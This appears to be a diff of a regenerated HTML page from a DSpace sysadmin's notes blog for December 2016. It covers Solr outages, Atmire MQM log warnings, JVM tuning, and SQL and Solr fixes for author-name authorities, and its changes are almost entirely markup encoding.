2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade
I&rsquo;ve raised a ticket with Atmire to ask
@ -36,17 +36,17 @@ Another worrying error from dspace.log is:
CGSpace was down for five hours in the morning while I was sleeping
While looking in the logs for errors, I see tons of warnings about Atmire MQM:
2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&quot;dc.title&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&quot;THUMBNAIL&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&quot;-1&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade
I&rsquo;ve raised a ticket with Atmire to ask
Another worrying error from dspace.log is:
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -76,12 +76,12 @@ Another worrying error from dspace.log is:
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -128,7 +128,7 @@ Another worrying error from dspace.log is:
<time datetime="2016-12-02T10:43:00+03:00">Fri Dec 02, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -137,17 +137,17 @@ Another worrying error from dspace.log is:
<li>CGSpace was down for five hours in the morning while I was sleeping</li>
<li>While looking in the logs for errors, I see tons of warnings about Atmire MQM:</li>
</ul>
<pre><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&quot;dc.title&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&quot;THUMBNAIL&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&quot;-1&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
</code></pre><ul>
<li>I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade</li>
<li>I&rsquo;ve raised a ticket with Atmire to ask</li>
<li>Another worrying error from dspace.log is:</li>
</ul>
<pre><code>org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceObjectDatasetGenerator.toDatasetQuery(Lorg/dspace/core/Context;)Lcom/atmire/statistics/content/DatasetQuery;
<pre tabindex="0"><code>org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceObjectDatasetGenerator.toDatasetQuery(Lorg/dspace/core/Context;)Lcom/atmire/statistics/content/DatasetQuery;
at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:972)
at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:852)
at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:882)
@ -236,13 +236,13 @@ Caused by: java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceOb
</code></pre><ul>
<li>The first error I see in dspace.log this morning is:</li>
</ul>
<pre><code>2016-12-02 03:00:46,656 ERROR org.dspace.authority.AuthorityValueFinder @ anonymous::Error while retrieving AuthorityValue from solr:query\colon; id\colon;&quot;b0b541c1-ec15-48bf-9209-6dbe8e338cdc&quot;
<pre tabindex="0"><code>2016-12-02 03:00:46,656 ERROR org.dspace.authority.AuthorityValueFinder @ anonymous::Error while retrieving AuthorityValue from solr:query\colon; id\colon;&#34;b0b541c1-ec15-48bf-9209-6dbe8e338cdc&#34;
org.apache.solr.client.solrj.SolrServerException: Server refused connection at: http://localhost:8081/solr/authority
</code></pre><ul>
<li>Looking through DSpace&rsquo;s solr log I see that about 20 seconds before this, there were a few 30+ KiB solr queries</li>
<li>The last logs here right before Solr became unresponsive (and right after I restarted it five hours later) were:</li>
</ul>
<pre><code>2016-12-02 03:00:42,606 INFO org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/select params={q=containerItem:72828+AND+type:0&amp;shards=localhost:8081/solr/statistics-2010,localhost:8081/solr/statistics&amp;fq=-isInternal:true&amp;fq=-(author_mtdt:&quot;CGIAR\+Institutional\+Learning\+and\+Change\+Initiative&quot;++AND+subject_mtdt:&quot;PARTNERSHIPS&quot;+AND+subject_mtdt:&quot;RESEARCH&quot;+AND+subject_mtdt:&quot;AGRICULTURE&quot;+AND+subject_mtdt:&quot;DEVELOPMENT&quot;++AND+iso_mtdt:&quot;en&quot;+)&amp;rows=0&amp;wt=javabin&amp;version=2} hits=0 status=0 QTime=19
<pre tabindex="0"><code>2016-12-02 03:00:42,606 INFO org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/select params={q=containerItem:72828+AND+type:0&amp;shards=localhost:8081/solr/statistics-2010,localhost:8081/solr/statistics&amp;fq=-isInternal:true&amp;fq=-(author_mtdt:&#34;CGIAR\+Institutional\+Learning\+and\+Change\+Initiative&#34;++AND+subject_mtdt:&#34;PARTNERSHIPS&#34;+AND+subject_mtdt:&#34;RESEARCH&#34;+AND+subject_mtdt:&#34;AGRICULTURE&#34;+AND+subject_mtdt:&#34;DEVELOPMENT&#34;++AND+iso_mtdt:&#34;en&#34;+)&amp;rows=0&amp;wt=javabin&amp;version=2} hits=0 status=0 QTime=19
2016-12-02 08:28:23,908 INFO org.apache.solr.servlet.SolrDispatchFilter @ SolrDispatchFilter.init()
</code></pre><ul>
<li>DSpace&rsquo;s own Solr logs don&rsquo;t give IP addresses, so I will have to enable Nginx&rsquo;s logging of <code>/solr</code> so I can see where this request came from</li>
@ -255,7 +255,7 @@ org.apache.solr.client.solrj.SolrServerException: Server refused connection at:
<li>I got a weird report from the CGSpace checksum checker this morning</li>
<li>It says 732 bitstreams have potential issues, for example:</li>
</ul>
<pre><code>------------------------------------------------
<pre tabindex="0"><code>------------------------------------------------
Bitstream Id = 6
Process Start Date = Dec 4, 2016
Process End Date = Dec 4, 2016
@ -278,8 +278,8 @@ Result = The bitstream could not be found
<li>For what it&rsquo;s worth, there is no item on DSpace Test or S3 backups with that checksum either&hellip;</li>
<li>In other news, I&rsquo;m looking at JVM settings from the Solr 4.10.2 release, from <code>bin/solr.in.sh</code>:</li>
</ul>
<pre><code># These GC settings have shown to work well for a number of common Solr workloads
GC_TUNE=&quot;-XX:-UseSuperWord \
<pre tabindex="0"><code># These GC settings have shown to work well for a number of common Solr workloads
GC_TUNE=&#34;-XX:-UseSuperWord \
-XX:NewRatio=3 \
-XX:SurvivorRatio=4 \
-XX:TargetSurvivorRatio=90 \
@ -296,7 +296,7 @@ GC_TUNE=&quot;-XX:-UseSuperWord \
-XX:CMSMaxAbortablePrecleanTime=6000 \
-XX:+CMSParallelRemarkEnabled \
-XX:+ParallelRefProcEnabled \
-XX:+AggressiveOpts&quot;
-XX:+AggressiveOpts&#34;
</code></pre><ul>
<li>I need to try these because they are recommended by the Solr project itself</li>
<li>Also, as always, I need to read <a href="https://wiki.apache.org/solr/ShawnHeisey">Shawn Heisey&rsquo;s wiki page on Solr</a></li>
@ -311,7 +311,7 @@ GC_TUNE=&quot;-XX:-UseSuperWord \
<li>Atmire responded about the MQM warnings in the DSpace logs</li>
<li>Apparently we need to change the batch edit consumers in <code>dspace/config/dspace.cfg</code>:</li>
</ul>
<pre><code>event.consumer.batchedit.filters = Community|Collection+Create
<pre tabindex="0"><code>event.consumer.batchedit.filters = Community|Collection+Create
</code></pre><ul>
<li>I haven&rsquo;t tested it yet, but I created a pull request: <a href="https://github.com/ilri/DSpace/pull/289">#289</a></li>
</ul>
@ -319,17 +319,17 @@ GC_TUNE=&quot;-XX:-UseSuperWord \
<ul>
<li>Some author authority corrections and name standardizations for Peter:</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;b041f2f4-19e7-4113-b774-0439baabd197&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Mora Benard%&#39;;
UPDATE 11
dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
dspace=# update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Hoek, R%&#39;;
UPDATE 36
dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
dspace=# update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%an der Hoek%&#39; and text_value !~ &#39;^.*W\.?$&#39;;
UPDATE 14
dspace=# update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
dspace=# update metadatavalue set authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thorne, P%&#39;;
UPDATE 42
dspace=# update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
dspace=# update metadatavalue set authority=&#39;0d8369bb-57f7-4b2f-92aa-af820b183aca&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thornton, P%&#39;;
UPDATE 360
dspace=# update metadatavalue set text_value='Grace, Delia', authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
dspace=# update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
UPDATE 561
</code></pre><ul>
<li>Pay attention to the regex to prevent false positives in tricky cases with Dutch names!</li>
@ -343,7 +343,7 @@ UPDATE 561
<li>The docs say a good starting point for a dedicated server is 25% of the system RAM, and our server isn&rsquo;t dedicated (also runs Solr, which can benefit from OS cache) so let&rsquo;s try 1024MB</li>
<li>In other news, the authority reindexing keeps crashing (I was manually running it after the author updates above):</li>
</ul>
<pre><code>$ time JAVA_OPTS=&quot;-Xms768m -Xmx768m -Dfile.encoding=UTF-8&quot; /home/dspacetest.cgiar.org/bin/dspace index-authority
<pre tabindex="0"><code>$ time JAVA_OPTS=&#34;-Xms768m -Xmx768m -Dfile.encoding=UTF-8&#34; /home/dspacetest.cgiar.org/bin/dspace index-authority
Retrieving all data
Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer
Exception: null
@ -376,31 +376,31 @@ sys 0m22.647s
<li>For example, do a Solr query for &ldquo;first_name:Grace&rdquo; and look at the results</li>
<li>Querying that ID shows the fields that need to be changed:</li>
</ul>
<pre><code>{
&quot;responseHeader&quot;: {
&quot;status&quot;: 0,
&quot;QTime&quot;: 1,
&quot;params&quot;: {
&quot;q&quot;: &quot;id:0b4fcbc1-d930-4319-9b4d-ea1553cca70b&quot;,
&quot;indent&quot;: &quot;true&quot;,
&quot;wt&quot;: &quot;json&quot;,
&quot;_&quot;: &quot;1481102189244&quot;
<pre tabindex="0"><code>{
&#34;responseHeader&#34;: {
&#34;status&#34;: 0,
&#34;QTime&#34;: 1,
&#34;params&#34;: {
&#34;q&#34;: &#34;id:0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#34;,
&#34;indent&#34;: &#34;true&#34;,
&#34;wt&#34;: &#34;json&#34;,
&#34;_&#34;: &#34;1481102189244&#34;
}
},
&quot;response&quot;: {
&quot;numFound&quot;: 1,
&quot;start&quot;: 0,
&quot;docs&quot;: [
&#34;response&#34;: {
&#34;numFound&#34;: 1,
&#34;start&#34;: 0,
&#34;docs&#34;: [
{
&quot;id&quot;: &quot;0b4fcbc1-d930-4319-9b4d-ea1553cca70b&quot;,
&quot;field&quot;: &quot;dc_contributor_author&quot;,
&quot;value&quot;: &quot;Grace, D.&quot;,
&quot;deleted&quot;: false,
&quot;creation_date&quot;: &quot;2016-11-10T15:13:40.318Z&quot;,
&quot;last_modified_date&quot;: &quot;2016-11-10T15:13:40.318Z&quot;,
&quot;authority_type&quot;: &quot;person&quot;,
&quot;first_name&quot;: &quot;D.&quot;,
&quot;last_name&quot;: &quot;Grace&quot;
&#34;id&#34;: &#34;0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#34;,
&#34;field&#34;: &#34;dc_contributor_author&#34;,
&#34;value&#34;: &#34;Grace, D.&#34;,
&#34;deleted&#34;: false,
&#34;creation_date&#34;: &#34;2016-11-10T15:13:40.318Z&#34;,
&#34;last_modified_date&#34;: &#34;2016-11-10T15:13:40.318Z&#34;,
&#34;authority_type&#34;: &#34;person&#34;,
&#34;first_name&#34;: &#34;D.&#34;,
&#34;last_name&#34;: &#34;Grace&#34;
}
]
}
@ -409,51 +409,51 @@ sys 0m22.647s
<li>I think I can just update the <code>value</code>, <code>first_name</code>, and <code>last_name</code> fields&hellip;</li>
<li>The update syntax should be something like this, but I&rsquo;m getting errors from Solr:</li>
</ul>
<pre><code>$ curl 'localhost:8081/solr/authority/update?commit=true&amp;wt=json&amp;indent=true' -H 'Content-type:application/json' -d '[{&quot;id&quot;:&quot;1&quot;,&quot;price&quot;:{&quot;set&quot;:100}}]'
<pre tabindex="0"><code>$ curl &#39;localhost:8081/solr/authority/update?commit=true&amp;wt=json&amp;indent=true&#39; -H &#39;Content-type:application/json&#39; -d &#39;[{&#34;id&#34;:&#34;1&#34;,&#34;price&#34;:{&#34;set&#34;:100}}]&#39;
{
&quot;responseHeader&quot;:{
&quot;status&quot;:400,
&quot;QTime&quot;:0},
&quot;error&quot;:{
&quot;msg&quot;:&quot;Unexpected character '[' (code 91) in prolog; expected '&lt;'\n at [row,col {unknown-source}]: [1,1]&quot;,
&quot;code&quot;:400}}
&#34;responseHeader&#34;:{
&#34;status&#34;:400,
&#34;QTime&#34;:0},
&#34;error&#34;:{
&#34;msg&#34;:&#34;Unexpected character &#39;[&#39; (code 91) in prolog; expected &#39;&lt;&#39;\n at [row,col {unknown-source}]: [1,1]&#34;,
&#34;code&#34;:400}}
</code></pre><ul>
<li>When I try using the XML format I get an error that the <code>updateLog</code> needs to be configured for that core</li>
<li>Maybe I can just remove the authority UUID from the records, run the indexing again so it creates a new one for each name variant, then match them correctly?</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority=null, confidence=-1 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=null, confidence=-1 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
UPDATE 561
</code></pre><ul>
<li>Then I&rsquo;ll reindex discovery and authority and see how the authority Solr core looks</li>
<li>After this, now there are authorities for some of the &ldquo;Grace, D.&rdquo; and &ldquo;Grace, Delia&rdquo; text_values in the database (the first version is actually the same authority that already exists in the core, so it was just added back to some text_values, but the second one is new):</li>
</ul>
<pre><code>$ curl 'localhost:8081/solr/authority/select?q=id%3A18ea1525-2513-430a-8817-a834cd733fbc&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ curl &#39;localhost:8081/solr/authority/select?q=id%3A18ea1525-2513-430a-8817-a834cd733fbc&amp;wt=json&amp;indent=true&#39;
{
&quot;responseHeader&quot;:{
&quot;status&quot;:0,
&quot;QTime&quot;:0,
&quot;params&quot;:{
&quot;q&quot;:&quot;id:18ea1525-2513-430a-8817-a834cd733fbc&quot;,
&quot;indent&quot;:&quot;true&quot;,
&quot;wt&quot;:&quot;json&quot;}},
&quot;response&quot;:{&quot;numFound&quot;:1,&quot;start&quot;:0,&quot;docs&quot;:[
&#34;responseHeader&#34;:{
&#34;status&#34;:0,
&#34;QTime&#34;:0,
&#34;params&#34;:{
&#34;q&#34;:&#34;id:18ea1525-2513-430a-8817-a834cd733fbc&#34;,
&#34;indent&#34;:&#34;true&#34;,
&#34;wt&#34;:&#34;json&#34;}},
&#34;response&#34;:{&#34;numFound&#34;:1,&#34;start&#34;:0,&#34;docs&#34;:[
{
&quot;id&quot;:&quot;18ea1525-2513-430a-8817-a834cd733fbc&quot;,
&quot;field&quot;:&quot;dc_contributor_author&quot;,
&quot;value&quot;:&quot;Grace, Delia&quot;,
&quot;deleted&quot;:false,
&quot;creation_date&quot;:&quot;2016-12-07T10:54:34.356Z&quot;,
&quot;last_modified_date&quot;:&quot;2016-12-07T10:54:34.356Z&quot;,
&quot;authority_type&quot;:&quot;person&quot;,
&quot;first_name&quot;:&quot;Delia&quot;,
&quot;last_name&quot;:&quot;Grace&quot;}]
&#34;id&#34;:&#34;18ea1525-2513-430a-8817-a834cd733fbc&#34;,
&#34;field&#34;:&#34;dc_contributor_author&#34;,
&#34;value&#34;:&#34;Grace, Delia&#34;,
&#34;deleted&#34;:false,
&#34;creation_date&#34;:&#34;2016-12-07T10:54:34.356Z&#34;,
&#34;last_modified_date&#34;:&#34;2016-12-07T10:54:34.356Z&#34;,
&#34;authority_type&#34;:&#34;person&#34;,
&#34;first_name&#34;:&#34;Delia&#34;,
&#34;last_name&#34;:&#34;Grace&#34;}]
}}
</code></pre><ul>
<li>So now I could set them all to this ID and the name would be ok, but there has to be a better way!</li>
<li>In this case it seems that since there were also two different IDs in the original database, I just picked the wrong one!</li>
<li>Better to use:</li>
</ul>
<pre><code>dspace#= update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>dspace#= update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;bfa61d7c-7583-4175-991c-2e7315000f0c&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
</code></pre><ul>
<li>This proves that unifying author name varieties in authorities is easy, but fixing the name in the authority is tricky!</li>
<li>Perhaps another way is to just add our own UUID to the authority field for the text_value we like, then re-index authority so they get synced from PostgreSQL to Solr, then set the other text_values to use that authority ID</li>
@ -461,17 +461,17 @@ UPDATE 561
<li>Deploy &ldquo;take task&rdquo; hack/fix on CGSpace (<a href="https://github.com/ilri/DSpace/pull/290">#290</a>)</li>
<li>I ran the following author corrections and then reindexed discovery:</li>
</ul>
